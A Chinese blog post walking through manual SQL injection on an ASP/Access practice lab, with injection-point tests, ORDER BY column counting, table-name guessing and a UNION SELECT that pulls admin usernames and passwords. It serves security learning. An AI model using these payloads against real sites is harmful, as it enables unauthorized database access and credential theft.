ACCESS手工注入靶场

已于 2024-08-20 12:53:02 修改
阅读量402 收藏 1
点赞数 12
文章标签: 数据库
于 2024-08-20 12:36:59 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_81881972/article/details/141352965
版权
步骤一:打开网页判断是否存在注入

判断注入点

news_view.asp?id=14' //报错

news_view.asp?id=14 and 1=1  //成功

news_view.asp?id=14 and 1=2  //报错

步骤二:判断当前数据库的字段文件...其到达8时页面置空,说明语句执行失败,当前数据库的字段
仅有7列

?id=14 order by 1

?id=14 order by 7

?id=14 order by 8

步骤三:判断回显的字段及猜测表名称在2与3位置可发现存在字段回显

表名可能有:admin, admins, admin_user, admin_usr ,admin_msg admin_login user username manager, administrator各种大小写变体

步骤四:猜解字段名在2与3位置上查询字段名这里只能考查不能考猜

union select 1,user_name,password,4,5,6,7 from administrator

步骤五:将获取的加密值解密

使用御剑查一下网站管理系统,第二个就是我们所需要的网站

双击这个打开,我们就可以知道管理系统的信息了

步骤六:ACCESS数据库注入过程基本靠猜..当然SQLMapYYDS;其下是整个显错注入流程使用到的语句…

你不要在理我了
关注
  • 12
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
整理比较全的Access SQL注入参考
09-14
Access SQL 注入参考 Access SQL 注入数据库安全领域中的一种常见的攻击手法,通过向 Access 数据库注入恶意的 SQL 代码,攻击者可以读取、修改或删除敏感数据。本文档旨在整理 Access SQL 注入的相关知识点,...
Access高级注入语句.txt
07-18
根据提供的文件信息,我们可以深入探讨有关Access数据库中的SQL注入技术,特别是高级注入技巧。下面将对文件中的几个关键部分进行详细解析。 ### Access高级注入语句解析 #### 一、Union Injection(联合注入) ...
asp+access注入网站源码
02-19
然而,由于ASP和Access的某些安全特性相对较弱,它们可能会成为SQL注入攻击的目标。 SQL注入是一种常见的网络攻击方式,攻击者通过输入恶意的SQL代码,来获取、修改、删除或者控制数据库中的敏感信息。在ASP+Access...
SQL手工注入大全:包含各种类型的SQL注入,实现手工注入的乐趣,此资源你值得拥有。
05-31
此资源包含:宽字节注入、SQL手工注入漏洞测试(Oracle数据库)、SQL手工注入漏洞测试(Sql Server数据库)、SQL手工注入漏洞测试(Access数据库)、SQL手工注入漏洞测试(PostgreSQL数据库)、SQL手工注入漏洞测试(MongoDB...
Access偏移注入利用-01
09-15
Access偏移注入利用-01
webjs 数据库 离线读取本地数据库源码-SAAS 本地化及未来之窗行业应用跨平台架构
cybersnow精通 28 门计算机语言,凭借其超凡的技术能力,成功开发过上万个应用,广泛涉及政府、商业、个人等众多领域,甚至在检察院、环保局、公安局等专业场景中也大放异彩。不仅熟练掌握单片机和物联网开发,在软件架构设计方面更是独树一帜,自创了跨平台软件
08-15 271
【代码】webjs 数据库 离线读取本地数据库源码-SAAS 本地化及未来之窗行业应用跨平台架构。
linux安装达梦数据库
最新发布
HAN_789的博客
08-19 104
如果无法创建dmdba 文件夹,需要进入root用户下 在管理员用户下,这种安装方式一般只用于验证,开发,测试,生产最好还是安装传统的方式安装。在 home/dmdba/dmdbms/bin 目录下执行。(1)将文件上传到 /home/dmdba/ 目录下。(2)加压:tar -xzvf dmdb.tar.gz。进入到root就可以创建dmdba 文件夹了。1、后台启动,一般建议用后台启动。
网上商品订单转手系统bootpf
weixin_43213064的博客
08-18 415
【代码】springboot网上商品订单转手系统bootpf
旅游网站
weixin_43213064的博客
08-16 1087
【代码】springboot旅游网站
mysql介绍
weixin_57763462的博客
08-14 397
丰富的存储引擎:MySQL 提供了多种存储引擎,如 InnoDB、MyISAM、Memory 等,每种存储引擎都有其特定的应用场景和优势。多语言支持:MySQL 支持多种编程语言,包括 C、C++、Python、Java、Perl、PHP 等,并提供了相应的 API。安全性:MySQL 提供了灵活的权限和密码系统,支持基于主机的验证,并且所有的密码传输都采用加密形式,确保了数据的安全性。管理工具:MySQL 提供了丰富的管理工具,如命令行客户端、图形界面管理工具等,方便用户进行数据库的管理和维护。
【Python使用】嘿马头条项目从到完整开发教程第1篇:简介,1. 内容【附代码文档】
一诺的博客
08-16 618
本教程的知识点为:简介 1. 内容 2. 目标 产品效果 ToutiaoWeb虚拟机使用说明 数据库 理解ORM 作用 思考: 使用ORM的方式选择 数据库 SQLAlchemy操作 1 新增 2 查询 all() 数据库 分布式ID 1 方案选择 2 头条 使用雪花算法 (代码 toutiao-backend/common/utils/snowflake) 数据库 Redis 1 Redis事务 基本事务指令 Python客户端操作 Git工用流 调试方法 JWT认证方案 JWT & JWS & JWE
[PHP]-Laravel中Group By引发的问题思考
hmx224_2014的专栏
08-16 478
Laravel 和 ThinkPHP 是两个不同的 PHP 框架,它们在底层使用了相同的 SQL 查询语言来与数据库交互。然而,由于框架的设计和实现方式不同,它们在生成 SQL 查询时可能会表现出一些细微的差异,包括对GROUP BY 子句的处理。在调用查询公司在线报告接口时,发现我请求的数据室20条每页,但是经查询存在16,17条的都有,并且后几页也不稳定,就一直查询问题。
企业架构MySQL读写分离
A1357924680_的博客
08-16 833
DAU : 2000 (每日活跃⽤户数) 之前业务中是单台 MySQL 提供服务,使用多台MySQL数据库务器,降低单台压力,实现集群架构的稳定性和高可用性 数据的一致性 完整性 replication通过业务比对和分析发现,随着活跃用户数增多,读取数据的请求变多,故着重解决读取数据的压力。基于主从复制的基础上,常见的数据库负载均衡使用的是读写分离方式。在业务代码中,数据库的操作,不直接连接数据库,而是先请求到中间件服务器(代理)由代理服务器,判断是读操作去从数据服务器,写操作去主数据服务器。
17.session不共享问题
卷土的博客
08-16 214
多台Tomcat并不共享session存储空间,当请求切换到不同的tomcat服务时导致数据丢失问题。考虑到以后微服务部署多个项目,也就是多个tomcat就会出现session不共享问题。
SAP Memory & ABAP Memory超级详细解析
qq_53645728的博客
08-18 999
该语句将使用 EXPORT 语句写入数据库表 dbtab 的数据集群的所有数据对象的内容表传递给内部表 itab,数据库表 dbtab 的 ID 位于 id 中指定的区域 ar 中。它们还定义了适当的转换规则。规则扩展的目的是,在结构类型相同的情况下,如果最高级别的源结构比数据簇中的目标结构有更多的组件,则多余的组件将被删除。允许使用以下值: F “表示基本的平面数据对象,”G “表示字符串,”R “表示平面结构,”S “表示深层结构,”T “表示具有平面行类型的内部表,”C "表示具有深层行类型的表。
实训day21
2201_75673097的博客
08-17 700
uid=997(mysql) gid=994(mysql) 组=994(mysql)2、为root账户刷新权限。
Pydantic serialisation 结合 tortoise-orm 使用文档
????Fender的博客????
08-16 1094
Pydantic serialisation 结合 tortoise-orm 使用文档
基于vue框架的爱看电影网站v4o92(程序+源码+数据库+调试部署+开发环境)系统界面在最后面。
h2345678的博客
08-15 1009
项目功能:用户,电影分类,电影信息,电影评分基于Vue框架的爱看电影网站项目功能丰富多样,旨在为用户提供一个集电影浏览、信息查询、观影体验、互动交流于一体的综合性平台。
Redis合集 第一章 数据结构 第一节 String数据结构
weixin_64260010的博客
08-15 220
String 的分类 String 普通字符串 int 整数 可以做自增 自减 float 浮点类型 可以做自增 自减 注意: 底层都是用字节数组存储 只不过编码的方式不同 常用命令 set 新增或修改key的value get 得到key的value mset 设置多个键值对 mget 得到多个key的value incr 让一个int的key增加1 incrby 让一个int的key自增并指定步长 incrbyfloat 让一个浮点数的数字自增并指定步长 setnt 添加一个String类型的键值对
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值